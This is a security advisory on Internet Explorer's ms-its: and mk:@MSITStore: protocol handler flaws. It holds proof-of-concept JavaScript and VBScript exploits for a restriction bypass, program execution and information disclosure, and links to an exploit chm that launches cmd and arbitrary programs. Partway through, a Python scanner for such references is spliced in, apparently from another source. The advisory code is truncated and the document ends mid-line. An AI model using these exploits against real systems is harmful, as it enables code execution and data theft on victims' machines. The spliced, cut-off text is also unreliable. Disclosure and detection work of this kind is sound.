Subject: IE ms-its: and mk:@MSITStore: vulnerability

advisory#2
/--------------------------------------------------------------------/
Vendor: Microsoft Corp.
Product: IE 6 (only tested on Windows XP; other products might be vulnerable too, including IE 5)
Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi@yahoo.com)
Discovery date: NOV 2001
Reported: MAR 2004
Title: IE ms-its: and mk:@MSITStore: vulnerability
MSRC: MSRC5162mr
/--------------------------------------------------------------------/

TABLE OF CONTENTS:
==================
Description..............................................1
Solutions................................................2
PoCs.....................................................3
References...............................................4
Contact info.............................................5
Disclaimer...............................................6

1) Description:
==================
There is a security issue in the way the ms-its: (its:) and mk:@MSITStore: protocol handlers become available to Internet Explorer after a *.chm file that is functional outside Help and Support Center is opened with showHelp(). Once that has happened, Internet Explorer can reach the contents of that file through the ms-its: (its:) or mk:@MSITStore: handlers, and the nature of these files makes this dangerous to users.

The pages that become available to IE through the ms-its: or mk:@MSITStore: handlers are only those of the chm file opened with showHelp(); however, this can be bypassed using the restriction bypass vulnerability previously reported by Arman Nayyeri. Note that the ms-its: and mk:@MSITStore: handlers are also available to IE when no chm file has been opened, but then the full path to the target chm file must be given, which is what makes the restriction bypass possible.
Combined with other vulnerabilities that can place files on the user's system, this makes it possible to open harmful HTML pages in the victim's My Computer zone. The fact that these two handlers accept the path of their target file suggests that it is also possible to run chm files from a web server in the victim's Internet zone in the same way, by giving their internet address:

ms-its:http:\\www.exploit.com\exploit.chm::\exploit.htm

Execution of programs is also possible, but only when a chm file that imports shared.js is already open. shared.js, which is part of ntshared.chm, is the main script used by most Windows chm files, and it has a lot of functionality that can be abused to bypass restrictions. When IE opens these files through the two handlers discussed here, they are not as restricted as a plain HTML file would be. Programs shipped with the OS can be executed by name, but it is also possible to run exe files by path, and some shell folders can be opened as well. Execution of a program can also be automated with an object tag. When a program is executed through an object tag on the victim's system, there is no need to know its exact path if its MUICache name is fixed: when such a program is called through an object, the MUICache is searched for an exe with the same MUICache name or exe name, and executables found this way are started without their exact path being known.
The following are some of these executables and shell folders:

I) exe/s
conf.exe
notepad.exe
ntbackup.exe
spider.exe
tourstart.exe
explorer.exe
iexplore.exe
RealPlay.exe
wmplayer.exe
xmplayer.exe
hh.exe
regedit.exe
sol.exe
taskmgr.exe
winmine.exe
WScript.exe
appwiz.cpl
access.cpl
hdwwiz.cpl
nusrmgr.cpl

II) folder/s
shell:windows
shell:cookies
shell:recent
shell:system
shell:Common AppData
shell:Common Desktop
shell:Common Documents
shell:Common Favorites
shell:Common Programs
shell:Common Start Menu
shell:Common Startup
shell:Common Templates
shell:Common Administrative Tools
shell:CommonVideo
shell:CommonPictures
shell:Personal
shell:local appdata
shell:profile
shell:Administrative Tools

The fact that IE can reach chm files through these two protocol handlers is due to the fact that this software does not act as a simple browser in Windows: IE is capable of interacting with and responding to different protocols, some of which, like "shell:", "about:" and "res:", have previously been reported vulnerable, which makes the author consider the remaining protocols vulnerable too.

*ntshared.js is also available via iexplore.chm.
*you might want to use (iexplore.chm::/iegetsrt.htm) to be confident it exists.
*ms-its:D:\x.chm::\run.htm: if run.htm is crafted so that it executes x.exe when it is called through ms-its:, Help searches D:\ to find x.exe.
*MUICache: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
*for more info on shell folders take a look at my first advisory: http://www.freewebs.com/roozbeh_afrasiabi/advisory(1).txt

2) Solutions:
==================
-Best solution
The best solution to this problem is limiting IE's functionality to that of a simple browser, which I doubt Microsoft is able to achieve in the near future, because most products, and even the Windows OS developed by Microsoft Corp., are based upon this extra functionality, which makes the situation even worse.
-Solution from author:
1) run regedit.exe
2) find the following key: HKEY_CLASSES_ROOT\PROTOCOLS\Handler
3) select any of the protocol handlers you consider unnecessary
4) disable them by placing "-" in front of their CLSID value
*The author considers most of these protocol handlers vulnerable, and it is best if users disable those protocols they find unsafe.
[Caution] If you have used the author's solution, be aware that running chm files directly from your system after disabling the handler in regedit will in some cases cause an instant restart.

-Solution from Microsoft:
Microsoft was notified and they had one week to give me their solution but they failed to do so. sorry mike could not wait longer.

3) Proof of concept:
===================
*download x.chm from http://www.freewebs.com/roozbeh_afrasiabi/x.chm for testing this vulnerability.
x.chm content:
dis-info.htm
exe(0).htm: list of some programs and shell folders that can be executed
exe(1).htm: cmd
exe(2).htm: minesweeper
exe(3).htm: notepad
exe(4).htm: wordpad
exe(5).htm: cmd+dir
exe(6).htm: c:\\x.exe
exe(7).htm: run your desired program, as long as either its path or its MUICache name is known
folder(1).htm: windows folder
folder(2).htm: profile folder
folder(3).htm: cookies folder
logoff.htm: on Windows XP causes user logoff
vulnerable.htm

a) availability of the two p-handlers using the exact path:
=========================
mk:@MSITStore:%windir%\Help\ntshared.chm::/copyright.htm
or
mk:@MSITStore:%windir%\Help\ntshared.chm::copyright.htm
%windir% = location of the operating system directory

The following PoC uses a vulnerability in wmplayer 8.0 to place x.chm on the victim's system.
<script language="javascript">
function preparecode(code) {
  result = '';
  lines = code.split(/\r\n/);
  for (i=0;i
  // (the remainder of preparecode() did not survive in this copy of the advisory)

function x(){
  // hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\exploit.htm
  // showHelp("ms-its:c:\\x.chm::exploit.htm")
  // showHelp("ms-its:addremov.chm::..\\..\\c:\\ntshared.chm::\\copyright.htm");
  // open vulnerable.htm out of the dropped x.chm through the ms-its: handler
  var mywindow = window.open("ms-its:c:\\x.chm::\\vulnerable.htm", "mywindow", "location=0,status=1,scrollbars=1");
  mywindow.moveTo(0,0);
}
</script>

*If you want to test this locally, change "http://www.freewebs.com/roozbeh_afrasiabi/x.chm" to file:\\location of chm file.
*for more info about the script that places the file on the victim's system visit malware.com or www.K-OTiK.Com.

The following PoC was given by Arman Nayyeri for the restriction bypass vulnerability; by changing the showHelp() call to window.open() you can use it as a PoC for my report too:
*rename c.chm to x.wsz

Wait For 8 Seconds...

<script>
setTimeout(
  function () {
    // walk out of %windir%\Help with ..\ and open a renamed chm (x.wsz) as the container
    window.open("mk:@MSITStore:iexplore.chm::..\\..\\..\\..\\program files\\winamp\\skins\\x.wsz::\\winamp.htm");
    // hcp://services/subsite?node=blank&topic=ms-its:c:\program files\winamp\skins\x.chm::\exe(7).htm
  },
  8000
);
</script>

*As seen above, it is also possible to use
hcp://services/subsite?node=blank&topic=ms-its:c:\x.chm::\exe(7).htm
if the victim's system is vulnerable to hcp://.

b) restriction bypass vulnerability
====================================
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
  target=window.open("ms-its:addremov.chm::..\\..\\ntshared.chm::\\copyright.htm")
}
</script>
Restriction Bypass Vulnerability + ms-its: p-handler vulnerability

<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
  ON ERROR RESUME NEXT
  showHelp("addremov.chm::/win_addprog_window_component.htm")
  getlink()
END SUB
</SCRIPT>

c) MS-its
==================
(situation: when showHelp() is used to make these p-handlers available)
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
  target=window.open("ms-its:addremov.chm::/win_addprog_install_program.htm")
}
</script>
Internet Explorer MS-ITS protocol handler vulnerability

<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
  ON ERROR RESUME NEXT
  showHelp("addremov.chm::/win_addprog_window_component.htm")
  getlink()
END SUB
</SCRIPT>

d) mk:@MSITStore
==================
(situation: when showHelp() is used to make these p-handlers available)
Exploit
<SCRIPT LANGUAGE=javascript>
function getlink(){
  target=window.open("mk:@MSITStore:isconcepts.chm::/ismain-concepts_52.htm/")
}
</script>
Internet Explorer mk:@MSITStore: protocol handler vulnerability

<SCRIPT LANGUAGE=VBSCRIPT>
Private SUB exploit_OnClick()
  ON ERROR RESUME NEXT
  showHelp("isconcepts.chm::/ismain-concepts_52.htm")
  getlink()
END SUB
</SCRIPT>

e) Either of these p-handlers allows use of the files the local chm file contains (*.js, *.gif, *.htm, *.css, *.xml):
=================================
ms-its:ntshared.chm::\warning.gif
ms-its:ntshared.chm::\shared.js
ms-its:ntshared.chm::\glossary.xml
ms-its:ntshared.chm::\coua.css

This can be used to test whether Help is running on the victim's system or not.
<SCRIPT LANGUAGE="JScript">
function x(){
  showHelp("filefold.chm::/windows_fcab_playall.htm");
  location.reload();
}
</script>

There is also the possibility of importing *.js files like shared.js:
<SCRIPT LANGUAGE="JScript" SRC="MS-ITS:ntshared.chm::/shared.js"></SCRIPT>

f) information disclosure
========================
Exploit


HTM help file opened in an iframe

<SCRIPT LANGUAGE=javascript>
exec="hello"
function getlink(){
  showHelp("filefold.chm::/windows_fcab_playall.htm")
  target.location.href="ms-its:filefold.chm::/windows_fcab_playall.htm"
  setTimeout("exploit()",4*100)
}
function exploit(){
  this.focus();
  // "target" is the iframe the help file was opened in and "x" the frame the result is
  // written to (their markup is not reproduced here); the moniker of the iframe is the
  // resolved path of the chm, so the drive and the Windows folder can be read off it
  loc=new String(target.moniker.substring(7,target.moniker.length));
  rootdrive=loc.substring(0,3);
  winloc=loc.substring(0,loc.indexOf("help"))
  x.document.write("root drive : "+rootdrive+"<br>")
  x.document.write("windows folder : "+winloc+"<br>")
}
</script>


Information disclosed:
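
Pulling together the URL forms exercised in sections a) through e) and h) above, and the moniker parsing of section f): a reference to either handler has the shape scheme + container (the .chm, possibly preceded by another container and a ..\ walk) + "::" + member page, and the dangerous shapes the advisory relies on are an absolute or remote container path, a second "::" with parent-directory traversal, and wrapping in hcp://...?topic=. The following scanner is an added example written for this edit in Python; it is not code from the advisory or from Microsoft. The regular expressions, the finding strings and the sample HTML are constructed for the example, and disclosed_paths() reproduces what the section f) script reads off target.moniker on the assumption that the moniker is the resolved mk:@MSITStore: path of a file under %windir%\Help.

```python
"""Scanner for ms-its: / its: / mk:@MSITStore: references in HTML or script text.

Added example for this edit, not code from the advisory.  It splits each reference
into container (the .chm) and member (the page inside it) and flags the shapes the
advisory relies on.  All regexes, finding strings and sample input are constructed."""
import re
from dataclasses import dataclass, field

# Scheme prefixes handled by the ITS (CHM) protocol handlers, lower-cased.
SCHEMES = ("mk:@msitstore:", "ms-its:", "its:")

# One handler reference: scheme followed by everything up to whitespace, a quote or a tag bracket.
REF_RE = re.compile(r'(?i)(?<![\w-])(?:mk:@msitstore:|ms-its:|its:)[^\s"\'<>]+')

# hcp://...?topic=<reference> as used in section h); group 1 is the wrapped reference.
HCP_RE = re.compile(r'(?i)hcp://[^\s"\'<>]*?[?&]topic=([^\s"\'<>&]+)')


@dataclass
class ChmRef:
    raw: str                 # the reference exactly as found in the text
    scheme: str              # lower-cased scheme prefix
    container: str           # .chm path as written (itself contains '::' when nested)
    member: str              # page inside the container (text after the last '::')
    via_hcp: bool = False    # reached through hcp://...?topic=
    findings: list = field(default_factory=list)

    @property
    def suspicious(self):
        return bool(self.findings)


def parse_ref(ref, via_hcp=False):
    """Split one reference into container and member and classify it."""
    low = ref.lower()
    scheme = next((s for s in SCHEMES if low.startswith(s)), None)
    if scheme is None:
        raise ValueError("not a CHM protocol handler reference: %r" % ref)
    rest = ref[len(scheme):]
    # a.chm::..\..\b.chm::\c.htm -> everything before the LAST '::' names the container(s).
    parts = rest.split("::")
    container, member = ("::".join(parts[:-1]), parts[-1]) if len(parts) > 1 else (rest, "")
    r = ChmRef(ref, scheme, container, member, via_hcp)
    c = container.lower()
    if re.match(r'^(https?|ftp):', c):
        r.findings.append("container fetched from a remote URL")
    elif re.match(r'^[a-z]:[\\/]|^\\\\', c):
        r.findings.append("container given as an absolute local path")
    elif c.startswith("%"):
        r.findings.append("container path expanded from an environment variable")
    if len(parts) > 2:
        r.findings.append("nested container (a second ::)")
    if any(seg == ".." for seg in re.split(r'::|[\\/]+', rest)):
        r.findings.append("parent-directory traversal")
    if via_hcp:
        r.findings.append("reached through hcp:// (Help and Support Center)")
    return r


def scan(text):
    """Return a ChmRef for every reference in `text`, hcp://-wrapped ones included."""
    refs, covered = [], []
    for m in HCP_RE.finditer(text):
        topic = m.group(1)
        if topic.lower().startswith(SCHEMES):
            refs.append(parse_ref(topic, via_hcp=True))
            covered.append(m.span(1))
    for m in REF_RE.finditer(text):
        if any(a <= m.start() < b for a, b in covered):
            continue  # already reported as the topic of an hcp:// link
        refs.append(parse_ref(m.group(0)))
    return refs


def report(text):
    """Map each reference found in `text` to its findings (an empty list means nothing flagged)."""
    return {r.raw: r.findings for r in scan(text)}


def disclosed_paths(moniker):
    """What section f) reads off target.moniker: (root drive, Windows directory),
    assuming the moniker is the resolved mk:@MSITStore: path of a file under %windir%\\Help."""
    r = parse_ref(moniker)
    m = re.match(r'(?i)^([a-z]:\\)(.*)\\help\\[^\\]+$', r.container)
    if not m:
        return None
    return m.group(1), m.group(1) + m.group(2) + "\\"


# Constructed sample: one harmless relative link plus the shapes from sections a), b), g) and h).
SAMPLE_HTML = r'''
<a href="mk:@MSITStore:ntshared.chm::/copyright.htm">about</a>
<script>window.open("ms-its:c:\\x.chm::\\vulnerable.htm","w");</script>
<script>window.open("ms-its:addremov.chm::..\\..\\ntshared.chm::\\copyright.htm");</script>
<iframe src="ms-its:http:\\www.example.test\exploit.chm::\exploit.htm"></iframe>
<a href="hcp://services/subsite?node=blank&topic=ms-its:c:\x.chm::\exe(7).htm">run</a>
'''

if __name__ == "__main__":
    for ref in scan(SAMPLE_HTML):
        flag = "SUSPICIOUS" if ref.suspicious else "ok"
        print("%-10s %s\n           container=%r member=%r\n           %s"
              % (flag, ref.raw, ref.container, ref.member, "; ".join(ref.findings) or "-"))
    print(disclosed_paths(r"mk:@MSITStore:C:\WINDOWS\Help\filefold.chm::/windows_fcab_playall.htm"))
```

Only the first sample link comes back clean; a bare chm name with a single "::" is what a legitimate Help page looks like, which is exactly why the handler cannot be blocked on scheme alone and the author's registry workaround disables it wholesale. Note that the container is taken from the text before the last "::" on purpose: in the restriction bypass of section b) the file that is actually opened is the one named after the ..\ walk, not the one the reference starts with.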

g) chm file on a web server
===========================
Exploit
*How about banner-free web pages for those who are vulnerable!!!

h) HCP://
==================
This shows that other programs that use Internet Explorer might be vulnerable too.
hcp://services/subsite?node=blank&topic=ms-its:isconcepts.chm::/ismain-concepts_62.htm
hcp://services/subsite?node=_System_/Tools_Center&topic=ms-its:c:\\x.chm::\vulnerable.htm

I) execution of programs
======================
Exploit
*"c:\\x.chm::exploitx.htm" can be replaced with http:\\www.exploit.com\x.chm::exploitx.htm, but to achieve this some changes must be made.
Links that execute programs have the following general look:
@@Shortcut text@@
callShortcut, a function in shared.js, changes links like this into an object:
<object id='hhShortcut' type='application/x-oleobject' classid='clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11' STYLE='display:none'></object>
This object is then inserted before the end of the htm page using the insertAdjacentHTML() function. The following would do the trick:
var __w=document.write('<object id=hhShortcut type=application/x-oleobject classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 STYLE=display:none\u003E